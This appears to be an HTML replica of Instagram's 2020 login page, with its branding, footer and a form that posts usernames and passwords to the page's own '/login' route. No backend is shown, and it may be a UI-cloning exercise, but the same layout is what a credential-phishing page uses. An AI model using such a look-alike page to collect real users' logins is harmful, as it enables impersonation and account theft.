<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width,initial_scale=1.0" />
    <title>Instagram</title>
    <link rel="stylesheet" href="static/css/style.css" />
    <link rel="stylesheet" href="static/css/media-queries.css" />
    <link rel="icon" href="static/photos/insta-icon.jpg" />
</head>
<body>
    <main>
        <div class="log-in-container">
            <div class="log-in">
                <img src="static/photos/logo.png" class="logo" />
                <form class="log-in-form" method="POST" action="/login">
                    <input type="text" name="username" placeholder="Phone number, username, or email" required />
                    <input type="password" name="password" placeholder="Password" required />
                    <button type="submit" class="log-in-button">Log In</button>
                </form>
                <span class="or-divider">OR</span>
                <div class="fb-login">
                    <a href="#">
                        <img src="static/photos/facebook-icon.png">
                        <span>Log in with Facebook</span>
                    </a>
                </div>
                <a href="#">Forgot password?</a>
            </div>
            <div class="sign-up">
                <span>Don't have an account? <a href="#">Sign up</a></span>
            </div>
            <div class="get-the-app">
                <span>Get the app</span>
                <div class="app-images">
                    <a href="#"><img src="photos/applestore.png" /></a>
                    <a href="#"><img src="photos/googlestore.png" /></a>
                </div>
            </div>
        </div>
        <div class="phones-container">
            <img src="static/photos/phones.png" />
        </div>
    </main>
    <footer>
        <ul class="footer-links">
            <li><a href="#">ABOUT</a></li>
            <li><a href="#">HELP</a></li>
            <li><a href="#">PRESS</a></li>
            <li><a href="#">API</a></li>
            <li><a href="#">JOBS</a></li>
            <li><a href="#">PRIVACY</a></li>
            <li><a href="#">TERMS</a></li>
            <li><a href="#">LOCATION</a></li>
            <li><a href="#">TOP</a></li>
            <li><a href="#">ACCOUNTS</a></li>
            <li><a href="#">HASHTAGS</a></li>
            <li><a href="#">LANGUAGE</a></li>
        </ul>
        <span class="copyright">&copy; 2020 INSTAGRAM FROM FACEBOOK</span>
    </footer>
</body>
</html>
